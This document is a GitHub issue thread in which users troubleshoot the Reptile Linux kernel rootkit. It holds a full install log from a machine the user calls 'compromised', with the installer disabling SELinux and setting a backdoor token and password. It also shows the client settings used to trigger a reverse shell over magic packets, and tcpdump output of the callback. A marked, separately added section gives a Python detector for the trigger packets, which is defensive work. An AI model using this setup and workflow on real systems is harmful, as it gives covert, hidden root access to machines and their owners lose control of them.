Closed PracaGrande closed 4 years ago
hey bro,
How are you installing Reptile (what is the whole list of configuration options)? On what system are you installing it? Is this system on the same network as yours, or is it behind a firewall?
I need more information to help you use it, or to discover if this is a bug.
So, I have a bug list for Reptile, and I intend to publish some updates soon.
thx,
403
Hi,
On the compromised machine, running Linux 2.6.32-754.22.1.el6.x86_64, I did:
# git clone https://github.com/f0rb1dd3n/Reptile.git
Initialized empty Git repository in /tmp/Reptile/.git/
remote: Enumerating objects: 793, done.
remote: Total 793 (delta 0), reused 0 (delta 0), pack-reused 793
Receiving objects: 100% (793/793), 243.44 KiB | 398 KiB/s, done.
Resolving deltas: 100% (434/434), done.
# cd Reptile/
# ./setup.sh install
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... enforcing
Trying to set enforce permissive... DONE!
Trying to disable SELinux... DONE!
Maybe you will need to reboot!
Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666): 50001
Would you like to config reverse shell each X time? (y/n) (default: n): n
Token: hax0r
Backdoor password: s3cr3t
SRC port: 50001
TAGs to hide file contents:
#<reptile>
content to be hidden
#</reptile>
Configuring... DONE!
Compiling... DONE!
Copying files to /reptile... DONE!
Installing... DONE!
Would you like to remove this directory (/tmp/Reptile/) on exit? (Y/N) [default: N]: n
Not removing /tmp/Reptile/
Instalation has finished!
After reboot, reptile_cmd seems to be working well.
$ /reptile/reptile_cmd show
Success!
$ ls -lisa /reptile/
total 652
1569794 4 drwxr-xr-x. 2 root root 4096 Sep 20 17:35 .
2 4 dr-xr-xr-x. 26 root root 4096 Sep 20 17:39 ..
1569797 8 -rwxrwxrwx. 1 root root 7048 Sep 20 17:35 reptile_cmd
1569795 572 -rwxrwxrwx. 1 root root 585543 Sep 20 17:35 reptile.ko
1569799 4 -rwxrwxrwx. 1 root root 2488 Sep 20 17:35 reptile_rc
1569796 56 -rwxrwxrwx. 1 root root 56224 Sep 20 17:35 reptile_reverse
1569798 4 -rwxrwxrwx. 1 root root 156 Sep 20 17:35 reptile_start
$ ls -lisa /sys/module/ | grep reptile
12653 0 drwxr-xr-x 5 root root 0 Sep 20 17:50 reptile
$ lsmod | grep reptile
reptile 13536 0
On the client side. Same network segment. Linux 3.10.0-1062.el7.x86_64
$ ./setup.sh client
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
Configuring... DONE!
Compiling... DONE!
Your client is at bin/
And then:
reptile-client> show
VAR VALUE DESCRIPTION
LHOST 192.168.118.157 Local host to receive the shell
LPORT 80 Local port to receive the shell
SRCHOST 192.168.118.157 Source host on magic packets (spoof)
SRCPORT 50001 Source port on magic packets (only for TCP/UDP)
RHOST 192.168.118.156 Remote host
RPORT 80 Remote port (only for TCP/UDP)
PROT TCP Protocol to send magic packet (ICMP/TCP/UDP)
PASS s3cr3t Backdoor password (optional)
TOKEN hax0r Token to trigger the shell
reptile-client> run
[*] Using password: s3cr3t
[*] Listening on port 80...
[*] TCP: 64 bytes was sent!
On the compromised system, running tcpdump, I can see that the client sends a TCP packet with the correct source port. It seems it correctly triggers the compromised system to send a packet back to port 80, but it is being refused.
17:55:25.600050 IP 192.168.118.157.50001 > 192.168.118.156.80: Flags [S], seq 1886257152:1886257176, win 8192, length 24
17:55:25.708139 IP 192.168.118.156.40622 > 192.168.118.157.80: Flags [S], seq 3216287733, win 14600, options [mss 1460,sackOK,TS val 688118 ecr 0,nop,wscale 7], length 0
17:55:25.708536 IP 192.168.118.157 > 192.168.118.156: ICMP host 192.168.118.157 unreachable - admin prohibited, length 68
Is there any additional listener or settings that I need to do on the client side?
Thank you
Never mind, on the client system I was running iptables. It's working correctly.
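Added example for defenders, not part of the thread and not code from the Reptile project: the capture quoted above shows a bare SYN carrying 24 bytes of payload, followed about 0.1 s later by a new outbound connection from the receiving host. The sketch below flags that pattern in tcpdump text output; the names `parse`, `find_triggers` and `SAMPLE` and the 5-second window are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# The first three lines are the capture quoted in the thread; the last line is
# a constructed, ordinary SYN added for contrast.
SAMPLE = """\
17:55:25.600050 IP 192.168.118.157.50001 > 192.168.118.156.80: Flags [S], seq 1886257152:1886257176, win 8192, length 24
17:55:25.708139 IP 192.168.118.156.40622 > 192.168.118.157.80: Flags [S], seq 3216287733, win 14600, options [mss 1460,sackOK,TS val 688118 ecr 0,nop,wscale 7], length 0
17:55:25.708536 IP 192.168.118.157 > 192.168.118.156: ICMP host 192.168.118.157 unreachable - admin prohibited, length 68
17:55:20.100000 IP 192.168.118.10.51514 > 192.168.118.156.22: Flags [S], seq 1000, win 29200, options [mss 1460], length 0
"""

# tcpdump's default one-line text format for TCP over IPv4.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]+)\],.*\blength (?P<len>\d+)\s*$"
)

def parse(capture):
    """Yield one dict per TCP line; ICMP and unparsable lines are skipped."""
    for line in capture.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            pkt = m.groupdict()
            pkt["ts"] = datetime.strptime(pkt["ts"], "%H:%M:%S.%f")
            pkt["len"] = int(pkt["len"])
            yield pkt

def find_triggers(capture, window=timedelta(seconds=5)):
    """Return (trigger, callbacks) pairs.

    trigger:   a bare SYN with payload (length > 0). TCP Fast Open can also
               put data on a SYN, so treat a hit as a lead, not a verdict.
    callbacks: bare SYNs sent by the trigger's destination host within
               `window` after it, i.e. new outbound connections.
    """
    pkts = list(parse(capture))
    findings = []
    for p in pkts:
        if p["flags"] != "S" or p["len"] == 0:
            continue
        callbacks = [q for q in pkts
                     if q["flags"] == "S" and q["src"] == p["dst"]
                     and timedelta(0) <= q["ts"] - p["ts"] <= window]
        findings.append((p, callbacks))
    return findings
```

The client output above labels SRCHOST as spoofable, so the callback destination is reported but not required to match the trigger's source address.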
Hi, nice work on putting this code together!
I'm trying to use the Port Knocking feature but still couldn't make it work. On the backdoor I used the following settings:
Token: hax0r
Backdoor password: s3cr3t
SRC port: 50001
After configuring the client I send the magic packet to the compromised system but don't get a connection back. Using tcpdump I can see the magic packet arriving at the compromised system. Tried connecting to an open and closed port on both TCP and UDP but no luck. Does the Reptile backdoor listen for the magic packet on any port?
Thanks